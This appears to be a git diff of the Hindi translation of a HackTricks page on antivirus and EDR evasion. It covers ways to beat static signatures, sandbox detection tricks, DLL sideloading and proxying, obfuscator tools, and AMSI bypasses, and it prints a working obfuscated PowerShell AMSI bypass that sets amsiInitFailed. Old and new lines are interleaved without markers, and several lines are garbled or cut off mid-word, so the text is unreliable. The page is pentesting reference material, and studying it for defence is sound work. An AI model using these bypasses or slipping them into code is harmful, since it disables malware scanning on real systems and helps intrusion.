* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) में **शामिल हों** या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

146
windows-hardening/av-bypass.md
View file

@ -2,25 +2,27 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.
</details>
**इस पेज को** [**@m2rc\_p**](https://twitter.com/m2rc\_p)** ने लिखा है!**
**इस पेज को** [**@m2rc\_p**](https://twitter.com/m2rc\_p) **ने लिखा है!**
## **AV Evasion Methodology**
## **AV इवेजन मेथडोलॉजी**
वर्तमान में, AVs फाइल को मैलिशस है या नहीं यह जांचने के लिए विभिन्न तरीके उपयोग करते हैं, स्टैटिक डिटेक्शन, डायनामिक विश्लेषण, और अधिक उन्नत EDRs के लिए, व्यवहारिक विश्लेषण.
वर्तमान में, AVs अलग-अलग तरीकों से जांच करते हैं कि एक फाइल मैलिशस है या नहीं, स्टेटिक डिटेक्शन, डायनामिक एनालिसिस, और अधिक उन्नत EDRs के लिए, बिहेवियरल एनालिसिस.
### **स्टटिक डिटेक्शन**
### **स्टटिक डिटेक्शन**
स्टटिक डिटेक्शन को बाइनरी या स्क्रिप्ट में ज्ञात मैलिशस स्ट्रिंग्स या बाइट्स के अर्रेज को फ्लैगिंग करके, और फाइल से स्वयं की जानकारी निकालकर (जैसे कि फाइल विवरण, कंपनी का नाम, डिजिटल हस्ताक्षर, आइकन, चेकसम, आदि) प्राप्त किया जाता है। इसका मतलब है कि ज्ञात सार्वजनिक टूल्स का उपयोग करने से आपको आसानी से पकड़ा जा सकता है, क्योंकि उन्हें संभवतः विश्लेषण किया गया है और मैलिशस के रूप में फ्लैग किया गया है। इस प्रकार की डिटेक्शन से बचने के कुछ तरीके हैं:
स्टटिक डिटेक्शन को बाइनरी या स्क्रिप्ट में ज्ञात मैलिशस स्ट्रिंग्स या बाइट्स के अर्रेस को फ्लैग करके, और फाइल से स्वयं की जानकारी निकालकर (जैसे कि फाइल विवरण, कंपनी का नाम, डिजिटल हस्ताक्षर, आइकन, चेकसम, आदि) हासिल की जाती है। इसका मतलब है कि ज्ञात सार्वजनिक टूल्स का उपयोग करने से आप अधिक आसानी से पकड़े जा सकते हैं, क्योंकि उन्हें संभवतः मैलिशस के रूप में विश्लेषित और फ्लैग किया गया होगा। इस प्रकार के डिटेक्शन से बचने के कुछ तरीके हैं:
* **एन्क्रिप्शन**
@ -28,31 +30,35 @@
* **ऑब्फस्केशन**
कभी-कभी आपको बस अपने बाइनरी या स्क्रिप्ट में कुछ स्ट्रिंग्स बदलने की जरूरत होती है ताकि वह AV से बच सके, लेकिन यह एक समय लेने वाला कार्य हो सकता है जिसे आप ऑब्फस्केट करने की कोशिश कर रहे हैं।
कभी-कभी आपको बस अपने बाइनरी या स्क्रिप्ट में कुछ स्ट्रिंग्स बदलने की जरूरत होती है ताकि वह AV से बच सके, लेकिन यह एक समय लेने वाला काम हो सकता है जिस पर आप ऑब्फस्केट करने की कोशिश कर रहे हैं।
* **कस्टम टूलिंग**
यदि आप अपने स्वयं के टूल्स विकसित करते हैं, तो कोई ज्ञात बुरे हस्ताक्षर नहीं होंगे, लेकिन इसमें बहुत समय और प्रयास लगता है।
{% hint style="info" %}
Windows Defender स्टटिक डिटेक्शन के खिलाफ जांच करने का एक अच्छा तरीका [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) है। यह मूल रूप से फाइल को कई खंडों में विभाजित करता है और फिर Defender को प्रत्येक एक को व्यक्तिगत रूप से स्कैन करने के लिए कहता है, इस तरह, यह आपको बिल्कुल बता सकता है कि आपके बाइनरी में कौन से स्ट्रिंग्स या बाइट्स फ्लैग किए गए हैं।
Windows Defender स्टटिक डिटेक्शन के खिलाफ जांच करने का एक अच्छा तरीका [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) है। यह मूल रूप से फाइल को कई सेगमेंट्स में विभाजित करता है और फिर Defender को प्रत्येक को व्यक्तिगत रूप से स्कैन करने का कार्य देता है, इस तरह, यह आपको बिल्कुल बता सकता है कि आपके बाइनरी में कौन से स्ट्रिंग्स या बाइट्स फ्लैग किए गए हैं।
{% endhint %}
मैं आपको व्यावहारिक AV Evasion के बारे में इस [YouTube प्लेलिस्ट](https://www.youtube.com/playlist?list=PLj05gPj8rk\_pkb12mDe4PgYZ5qPxhGKGf) को देखने की अत्यधिक सिफारिश करता हूँ।
मैं आपको व्यावहारिक AV इवेजन के बारे में इस [YouTube प्लेलिस्ट](https://www.youtube.com/playlist?list=PLj05gPj8rk\_pkb12mDe4PgYZ5qPxhGKGf) को देखने की अत्यधिक सिफारिश करता हूँ।
### **डायनामिक विश्लेषण**
### **डायनामिक एनालिसिस**
डायनामिक विश्लेषण तब होता है जब AV आपके बाइनरी को एक सैंडबॉक्स में चलाता है और मैलिशस गतिविधि के लिए देखता है (जैसे कि आपके ब्राउज़र के पासवर्ड को डिक्रिप्ट करने और पढ़ने की कोशिश करना, LSASS पर मिनिडंप करना, आदि)। इस भाग के साथ काम करना थोड़ा जटिल हो सकता है, लेकिन यहाँ कुछ चीजें हैं जो आप सैंडबॉक्स से बचने के लिए कर सकते हैं।
डायनामिक एनालिसिस तब होता है जब AV आपके बाइनरी को एक सैंडबॉक्स में चलाता है और मैलिशस गतिविधि के लिए देखता है (जैसे कि आपके ब्राउज़र के पासवर्ड को डिक्रिप्ट करने और पढ़ने की कोशिश करना, LSASS पर मिनिडंप करना, आदि)। इस भाग के साथ काम करना थोड़ा जटिल हो सकता है, लेकिन यहाँ कुछ चीजें हैं जो आप सैंडबॉक्स से बचने के लिए कर सकते हैं।
* **निष्पादन से पहले स्लीप** यह कैसे लागू किया गया है, इस पर निर्भर करते हुए, यह AV के डायनामिक विश्लेषण को बायपास करने का एक शानदार तरीका हो सकता है। AV के पास उपयोगकर्ता के कार्यप्रवाह को बाधित न करने के लिए फाइलों को स्कैन करने क बहुत कम समय होता है, इसलिए लंबे स्लीप का उपयोग करने से बाइनरीज का विश्लेषण बाधित हो सकता है। समस्या यह है कि कई AV के सैंडबॉक्स स्लीप को कैसे लागू किया गया है, इसके आधार पर स्लीप को बस स्किप कर सकते हैं।
* **मशीन के संसाधनों की जांच** आमतौर पर सैंडबॉक्स के पास काम करने के लिए बहुत कम संसाधन होते हैं (जैसे < 2GB RAM), अन्यथ वे उपयगकर्त मश कर सकते हैं आप यह बहुत रचनत्मक सकते हैं, उदहरण के ि CPU के पम ंच करके यह तक ि पंखे गति ी, सैंडबक्स में सब कुछ गू नह ा।
* **मशीन-विशिष्ट जांच** यदि आप "contoso.local" डोमेन से जुड़े उपयोगकर्ता के कार्यस्थान को लक्षित करना चाहते हैं, तो आप कंप्यूटर के डोमेन की जांच कर सकते हैं कि क्या वह आपके निर्दिष्ट डोमेन से मेल खाता है, यदि नहीं, तो आप अपने प्रोग्राम को बाहर निकाल सकते हैं।
* **निष्पादन से पहले स्लीप** यह कैसे लागू किया गया है, इस पर निर्भर करते हुए, AV के डायनामिक एनालिसिस को बायपास करने का एक शानदार तरीका हो सकता है। AV के पास फाइलों को स्कैन करने के लिए बहुत कम समय होता है ताकि उपयोगकर्ता के कार्यप्रवाह में बाधा न डालें, इसलिए लंबे स्लीप का उपयोग करने से बाइनरीज का विश्लेषण बाधित हो सकता है। समस्या यह है कि कई AV के सैंडबॉक्स स्लीप को कैसे लागू किया गया है, इसके आधार पर स्लीप को बस स्किप कर सकते हैं।
* **मशीन के संसाधनों की जांच** आमतौर पर सैंडबॉक्स के पास काम करने के लिए बहुत कम संसाधन होते हैं (जैसे < 2GB RAM), अन्यथ वे उपयगकर्त मश कर सकते हैं आप यह बहुत रचनत्मक सकते हैं, उदहरण के ि CPU के पम ंच करके यह तक ि फैन गति ंच करके, सब कुछ सैंडबक्स में गू नह ि ा।
* **मशीन-विशिष्ट जांच** यदि आप एक उपयोगकर्ता को लक्षित करना चाहते हैं जिसका कार्यस्थान "contoso.local" डोमेन से जुड़ा हुआ है, तो आप कंप्यूटर के डोमेन की जांच कर सकते हैं कि क्या वह आपके निर्दिष्ट डोमेन से मेल खाता है, यदि नहीं, तो आप अपने प्रोग्राम को बाहर निकाल सकते हैं।
यह पता चला है कि Microsoft Defender के सैंडबॉक्स का कंप्यूटरनाम HAL9TH है, इसलिए, आप अपने मैलवेयर में कंप्यूटर का नाम जांच सकते हैं विस्फोट से पहले, यदि नाम HAL9TH से मेल खाता है, इसका मतलब है कि आप डिफेंडर के सैंडबॉक्स के अंदर हैं, इसलिए आप अपने प्रोग्राम को बाहर निकाल सकते हैं।
यह पता चला है कि Microsoft Defender के सैंडबॉक्स का कंप्यूटरनाम HAL9TH है, इसलिए, आप अपने मैलवेयर में कंप्यूटर का नाम चेक कर सकते हैं विस्फोट से पहले, यदि नाम HAL9TH से मेल खाता है, इसका मतलब है कि आप डिफेंडर के सैंडबॉक्स के अंदर हैं, इसलिए आप अपने प्रोग्राम को बाहर निकाल सकते हैं।
<figure><img src="../.gitbook/assets/image (3) (6).png" alt=""><figcaption><p>स्रोत: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
[@mgeeky](https://twitter.com/mariuszbit) से सैंड
[@mgeeky](https://twitter.com/mariuszbit) से सैंडबॉक्स के खिलाफ जाने के लिए कुछ और वास्तव में अच्छी टिप्स
<figure><img src="../.gitbook/assets/image (2) (1) (1) (2) (1).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev चैनल</p></figcaption></figure>
जैसा कि हमने इस पोस्ट में पहले कहा है, **सार्वजनिक टूल्स** अंततः **पता ल
```powershell
Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
@ -65,13 +71,13 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
मैं आपको **खुद DLL हाइजैकेबल/साइडलोडेबल प्रोग्रामों का पता लगाने की** दृढ़ता से सिफारिश करता हूँ, यह तकनीक ठीक से की जाए तो काफी चुपके से होती है, लेकिन अगर आप सार्वजनिक रूप से ज्ञात DLL साइडलोडेबल प्रोग्रामों का उपयोग करते हैं, तो आप आसानी से पकड़े जा सकते हैं।
केवल एक दुर्भावनापूर्ण DLL को उस नाम से रख देना जिसे प्रोग्राम लोड करने की उम्मीद करता है, आपके पेलोड को लोड नहीं करेगा, क्योंकि प्रोग्राम उस DLL में कुछ विशिष्ट फंक्शन्स की उम्मीद करता है, इस समस्या को ठीक करने के लिए, हम **DLL प्रॉक्सींग/फॉरवर्डिंग** नामक एक और तकनीक का उपयोग करेंगे।
केवल एक दुर्भावनापूर्ण DLL को उस नाम से रखने से, जिसे प्रोग्राम लोड करने की उम्मीद करता है, आपका पेलोड लोड नहीं होगा, क्योंकि प्रोग्राम उस DLL में कुछ विशिष्ट फंक्शन्स की उम्मीद करता है, इस समस्या को ठीक करने के लिए, हम **DLL प्रॉक्सींग/फॉरवर्डिंग** नामक एक और तकनीक का उपयोग करेंगे।
**DLL प्रॉक्सींग** प्रोग्राम द्वारा प्रॉक्सी (और दुर्भावनापूर्ण) DLL से मूल DLL तक कॉल्स को फॉरवर्ड करता है, इस प्रकार प्रोग्राम की कार्यक्षमता को बनाए रखता है और आपके पेलोड के निष्पादन को संभालने में सक्षम होता है।
**DLL प्रॉक्सींग** प्रोग्राम द्वारा प्रॉक्सी (और दुर्भावनापूर्ण) DLL से मूल DLL को किए गए कॉल्स को फॉरवर्ड करता है, इस प्रकार प्रोग्राम की कार्यक्षमता को बनाए रखता है और आपके पेलोड के निष्पादन को संभालने में सक्षम होता है।
मैं [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) प्रोजेक्ट का उपयोग करूँगा जो [@flangvik](https://twitter.com/Flangvik/) से है।
मैंने जो कदम उठाए वे ये हैं:
ये वो कदम हैं जिनका मैंने अनुसरण किया:
{% code overflow="wrap" %}
```
@ -82,7 +88,7 @@ C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hija
```
{% endcode %}
अंतिम कमांड हमें 2 फाइलें देगा: एक DLL सोर्स कोड टेम्पलेट, और मूल पुनः नामित DLL।
अंतिम कमांड हमें 2 फाइलें देगा: एक DLL सोर्स कोड टेम्पलेट, और मूल पुनः नामित DLL।
<figure><img src="../.gitbook/assets/sharpdllproxy.gif" alt=""><figcaption></figcaption></figure>
@ -128,7 +134,7 @@ AMSI का निर्माण "[fileless malware](https://en.wikipedia.org/w
AMSI सुविधा Windows के इन घटकों में एकीकृत है।
* User Account Control, या UAC (EXE, COM, MSI, या ActiveX स्थापना का उन्नयन)
* PowerShell (स्क्रिप्ट्स, इंटरैक्टिव उपयोग, और गतिशील कोड मूल्यांकन)
* PowerShell (स्क्रिप्ट, इंटरैक्टिव उपयोग, और गतिशील कोड मूल्यांकन)
* Windows Script Host (wscript.exe और cscript.exe)
* JavaScript और VBScript
* Office VBA macros
@ -139,25 +145,25 @@ AMSI सुविधा Windows के इन घटकों में एक
<figure><img src="../.gitbook/assets/image (4) (5).png" alt=""><figcaption></figcaption></figure>
ध्यान दें कि यह कैसे `amsi:` को जोड़ता है और फिर उस एक्जीक्यूटेबल का पथ जिससे स्क्रिप्ट चली, इस मामले में, powershell.exe
ध्यान दें कि यह `amsi:` को कैसे जोड़ता है और फिर उस एक्जीक्यूटेबल का पथ जिससे स्क्रिप्ट चली, इस मामले में, powershell.exe
हमने डिस्क पर कोई फाइल नहीं डाली, लेकिन फिर भी AMSI के कारण in-memory में पकड़े गए।
हमने डिस्क पर कोई फाइल नहीं डाली, लेकिन AMSI के कारण in-memory में फिर भी पकड़े गए।
AMSI को बायपास करने के कुछ तरीके हैं:
* **Obfuscation**
चूंकि AMSI मुख्य रूप से स्थिर पतासाजी के साथ काम करता है, इसलिए, आप जो स्क्रिप्ट्स लोड करने की कोशिश करते हैं, उन्हें संशोधित करना पतासाजी का पता लगाने से बचने का एक अच्छा तरीका हो सकता है।
चूंकि AMSI मुख्य रूप से स्थिर पताचार के साथ काम करता है, इसलिए आप जो स्क्रिप्ट लोड करने की कोशिश करते हैं उसे संशोधित करना पता चलने से बचने का एक अच्छा तरीका हो सकता है।
हालांकि, AMSI के पास कई परतों के बावजूद स्क्रिप्ट्स को अनऑब्फस्केट करने की क्षमता है, इसलिए obfuscation इस पर निर्भर करते हुए एक खराब विकल्प हो सकता है कि यह कैसे किया जाता है। इससे बचना इतना सीधा नहीं है। हालांकि, कभी-कभी, आपको बस कुछ वेरिएबल नामों को बदलने की जरूरत होती है और आप अच्छे होंगे, इसलिए यह निर्भर करता है कि कितना कुछ चिह्नित किया गया है।
हालांकि, AMSI के पास कई परतों के बावजूद स्क्रिप्ट्स को अनऑब्फस्केट करने की क्षमता है, इसलिए obfuscation यह कैसे किया जाता है के आधार पर एक खराब विकल्प हो सकता है। इससे बचना इतना सीधा नहीं है। हालांकि, कभी-कभी, आपको बस कुछ वेरिएबल नामों को बदलने की जरूरत होती है और आप अच्छे होंगे, इसलिए यह निर्भर करता है कि कितना कुछ फ्लैग किया गया है।
* **AMSI Bypass**
चूंकि AMSI को powershell (साथ ही cscript.exe, wscript.exe, आदि) प्रक्रिया में एक DLL लोड करके लागू किया जाता है, इसलिए इसे आसानी से छेड़छाड़ करना संभव है यहां तक कि एक अनाधिकृत उपयोगकर्ता के रूप में चल रहा हो। AMSI के कार्यान्वयन में इस दोष के कारण, शोधकर्ताओं ने AMSI स्कैनिंग को बायपास करने के कई तरीके खोजे हैं।
चूंकि AMSI को powershell (साथ ही cscript.exe, wscript.exe, आदि) प्रक्रिया में एक DLL लोड करके लागू किया जाता है, इसलिए इसे आसानी से छेड़छाड़ करना संभव है यहां तक कि एक अनाधिकृत उपयोगकर्ता के रूप में भी चल रहा हो। AMSI के कार्यान्वयन में इस दोष के कारण, शोधकर्ताओं ने AMSI स्कैनिंग को बायपास करने के कई तरीके खोजे हैं।
**एक त्रुटि को मजबूर करना**
AMSI प्रारंभीकरण को विफल करने के लिए मजबूर करना (amsiInitFailed) का परिणाम यह होगा कि वर्तमान प्रक्रिया के लिए कोई स्कैन शुरू नहीं किया जाएगा। मूल रूप से यह [Matt Graeber](https://twitter.com/mattifestation) द्वारा प्रकट किया गया था और Microsoft ने इसके व्यापक उपयोग को रोकने के लिए एक हस्ताक्षर विकसित किया है।
AMSI प्रारंभीकरण को विफल करने के लिए मजबूर करना (amsiInitFailed) का परिणाम यह होगा कि वर्तमान प्रक्रिया के लिए कोई स्कैन शुरू नहीं किया जाएगा। मूल रूप से यह [Matt Graeber](https://twitter.com/mattifestation) द्वारा प्रकट किया गया था और Microsoft ने व्यापक उपयोग को रोकने के लिए एक हस्ताक्षर विकसित किया है।
{% code overflow="wrap" %}
```powershell
@ -165,9 +171,9 @@ AMSI प्रारंभीकरण को विफल करने के
```
{% endcode %}
केवल एक पंक्ति का powershell कोड था जिसने वर्तमान powershell प्रक्रिया के लिए AMSI को अक्षम कर दिया। यह पंक्ति AMSI द्वारा स्वयं ही चिह्नित की गई है, इसलिए इस तकनीक का उपयोग करने के लिए कुछ संशोधन की आवश्यकता है।
केवल एक पंक्ति की powershell कोड की आवश्यकता थी ताकि वर्तमान powershell प्रक्रिया के लिए AMSI को अक्षम किया जा सके। यह पंक्ति AMSI द्वारा स्वयं ही चिह्नित की गई है, इसलिए इस तकनीक का उपयोग करने के लिए कुछ संशोधन की आवश्यकता है।
यहाँ एक संशोधित AMSI बायपास है जिसे मैंने इस [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db) से लिया है।
यहाँ एक संशोधित AMSI bypass है जिसे मैंने इस [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db) से लिया है।
```powershell
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
@ -181,31 +187,31 @@ $Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
```
ध्यान रखें, यह संभवतः इस पोस्ट के बाहर आने के बाद चिह्नित हो जाएगा, इसलिए यदि आपकी योजना अप्रकट रहने की है तो कोई कोड प्रकाशित न करें
ध्यान रखें, यह संभवतः इस पोस्ट के बाहर आने के बाद चिह्नित हो जाएगा, इसलिए यदि आपकी योजना अप्रकट रहने की है तो आपको कोई कोड प्रकाशित नहीं करना चाहिए
**मेमोरी पैचिंग**
इस तकनीक की खोज मूल रूप से [@RastaMouse](https://twitter.com/\_RastaMouse/) ने की थी और इसमें "AmsiScanBuffer" फंक्शन के लिए पता खोजना शामिल है amsi.dll में (जो उपयोगकर्ता-प्रदत्त इनपुट को स्कैन करने के लिए जिम्मेदार है) और इसे E_INVALIDARG के कोड के लिए निर्देशों के साथ ओवरराइट करना, इस तरह, वास्तविक स्कैन का परिणाम 0 लौटाएगा, जिसे साफ परिणाम के रूप में व्याख्या किया जाता है।
इस तकनीक की खोज मूल रूप से [@RastaMouse](https://twitter.com/\_RastaMouse/) ने की थी और इसमें "AmsiScanBuffer" फंक्शन के लिए पता खोजना शामिल है जो amsi.dll में होता है (जो उपयोगकर्ता-प्रदत्त इनपुट को स्कैन करने के लिए जिम्मेदार होता है) और इसे E_INVALIDARG के कोड के लिए निर्देशों के साथ ओवरराइट करना, इस तरह, वास्तविक स्कैन का परिणाम 0 लौटगा, जिसे साफ परिणाम के रूप में व्याख्या किया जाता है।
{% hint style="info" %}
कृपया अधिक विस्तृत स्पष्टीकरण के लिए [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) पढ़ें।
{% endhint %}
पावरशेल के साथ AMSI को बायपास करने के लिए कई अन्य तकनीकें भी प्रयोग की जाती हैं, [**इस पृष्ठ**](basic-powershell-for-pentesters/#amsi-bypass) और [इस रेपो](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) को देखें उनके बारे में और जानने के लिए
पावरशेल के साथ AMSI को बायपास करने के लिए कई अन्य तकनीकें भी प्रयोग की जाती हैं, उनके बारे में जानने के लिए [**इस पृष्ठ**](basic-powershell-for-pentesters/#amsi-bypass) और [इस रेपो](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) को देखें।
या यह स्क्रिप्ट जो मेमोरी पैचिंग के माध्यम से हर नए Powersh को पैच करेगी
## ब्फस्केशन
## ब्फस्केशन
कई उपकरण हैं जिनका उपयोग **C# स्पष्ट-पाठ कोड को ब्फस्केट करने**, **मेटाप्रोग्रामिंग टेम्पलेट्स उत्पन्न करने** के लिए किया जा सकता है जिससे बाइनरीज को कंपाइल किया जा सके या **संकलित बाइनरीज को ऑब्फस्केट करने** जैसे:
कई उपकरण हैं जिनका उपयोग **C# स्पष्ट-पाठ कोड को ब्फस्केट करने**, **मेटाप्रोग्रामिंग टेम्पलेट्स उत्पन्न करने** के लिए किया जा सकता है ताकि बाइनरीज़ को कंपाइल किया जा सके या **संकलित बाइनरीज़ को ओब्फस्केट किया जा सके** जैसे:
* [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# ब्फस्केटर**
* [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): इस प्रोजेक्ट का उद्देश्य [LLVM](http://www.llvm.org/) संकलन सूट का एक ओपन-सोर्स फोर्क प्रदान करना है जो [कोड ब्फस्केशन](http://en.wikipedia.org/wiki/Obfuscation\_\(software\)) और टैम्पर-प्रूफिंग के माध्यम से बढ़ी हुई सॉफ्टवेयर सुरक्षा प्रदान कर सकता है
* [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator दिखाता है कि कैसे `C++11/14` भाषा का उपयोग करके, संकलन समय पर, किसी भी बाहरी उपकरण का उपयोग किए बिना और कंपाइलर को संशोधित किए बिना ब्फस्केटेड कोड उत्पन्न किया जा सकता है।
* [**obfy**](https://github.com/fritzone/obfy): C++ टेम्पलेट मेटाप्रोग्रामिंग फ्रेमवर्क द्वारा उत्पन्न ब्फस्केटेड ऑपरेशन्स की एक परत जोड़ें जो एप्लिकेशन को क्रैक करने की इच्छा रखने वाले व्यक्ति के जीवन को थोड़ा कठिन बना देगी।
* [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz एक x64 बाइनरी ब्फस्केटर है जो विभिन्न प्रकार की pe फाइलों को ब्फस्केट कर सकता है जिसमें: .exe, .dll, .sys शामिल हैं
* [**metame**](https://github.com/a0rtega/metame): Metame एक सरल मेटामर्फिक कोड इंजन है जो मनमाने एक्जीक्यूटेबल्स के लिए है।
* [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator एक बारीक-दाने वाला कोड ब्फस्केशन फ्रेमवर्क है जो ROP (रिटर्न-ओरिएंटेड प्रोग्रामिंग) का उपयोग करके LLVM-समर्थिषाओं के लिए है। ROPfuscator एक प्रोग्राम को असेंबली कोड स्तर पर ब्फस्केट करता है, नियमित निर्देशों को ROP चेन्स में बदलकर, हमारी सामान्य धारणा को सामान्य नियंत्रण प्रवाह को बाधित करता है।
* [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# ब्फस्केटर**
* [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): इस प्रोजेक्ट का उद्देश्य [LLVM](http://www.llvm.org/) संकलन सूट का एक ओपन-सोर्स फोर्क प्रदान करना है जो [कोड ब्फस्केशन](http://en.wikipedia.org/wiki/Obfuscation\_\(software\)) और टैम्पर-प्रूफिंग के माध्यम से बढ़ी हुई सॉफ्टवेयर सुरक्षा प्रदान कर सक
* [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator दिखाता है कि कैसे `C++11/14` भाषा का उपयोग करके, कंपाइल समय पर, किसी भी बाहरी उपकरण का उपयोग किए बिना और कंपाइलर को संशोधित किए बिना ब्फस्केटेड कोड उत्पन्न किया जा सकता है।
* [**obfy**](https://github.com/fritzone/obfy): C++ टेम्पलेट मेटाप्रोग्रामिंग फ्रेमवर्क द्वारा उत्पन्न ब्फस्केटेड ऑपरेशन्स की एक परत जोड़ें जो एप्लिकेशन को क्रैक करने की इच्छा रखने वाले व्यक्ति के जीवन को थोड़ा कठिन बना देगी।
* [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz एक x64 बाइनरी ब्फस्केटर है जो विभिन्न प्रकार की pe फाइलों को ब्फस्केट कर सकता है जिसमें: .exe, .dll, .sys शामिल हैं
* [**metame**](https://github.com/a0rtega/metame): Metame एक सरल मेटामर्फिक कोड इंजन है जो मनमाने एक्जीक्यूटेबल्स के लिए है।
* [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator एक बारीक-दाने वाला कोड ब्फस्केशन फ्रेमवर्क है जो LLVM-समर्थित भाषाओं के लिए ROP (रिटर्न-ओरिएंटेड प्रोग्रामिंग) का उपयोग करता है। ROPfuscator एक प्रोग्राम को असेंबली कोड स्तर पर ब्फस्केट करता है, नियमित निर्देशों को ROP चेन्स में बदलकर, हमारी सामान्य संकल्पना को सामान्य नियंत्रण प्रवाह के रूप में बाधित करता है।
* [**Nimcrypt**](https://github.com/icyguider/nimcrypt): Nimcrypt एक .NET PE Crypter है जो Nim में लिखा गया है
* [**inceptor**](https://github.com/klezVirus/inceptor)**:** Inceptor मौजूदा EXE/DLL को शेलकोड में बदलने और फिर उन्हें लोड करने में सक्षम है
@ -219,7 +225,7 @@ Microsoft Defender SmartScreen एक सुरक्षा तंत्र ह
SmartScreen मुख्य रूप से प्रतिष्ठा-आधारित दृष्टिकोण के साथ काम करता है, अर्थात असामान्य रूप से डाउनलोड किए गए एप्लिकेशन्स SmartScreen को ट्रिगर करेंगे जिससे अंतिम उपयोगकर्ता को सतर्क किया जाएगा और फाइल को निष्पादित करने से रोका जाएगा (हालांकि फाइल को अभी भी More Info -> Run anyway पर क्लिक करके निष्पादित किया जा सकता है)।
**MoTW** (Mark of The Web) एक [NTFS Alternate Data Stream](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)) है जिसका नाम Zone.Identifier है जो इंटरनेट से फाइलें डाउनलोड करते समय स्वचालित रूप से बनाया जाता है, साथ ही उस URL के साथ जहां से यह डाउनलोड किया गया था।
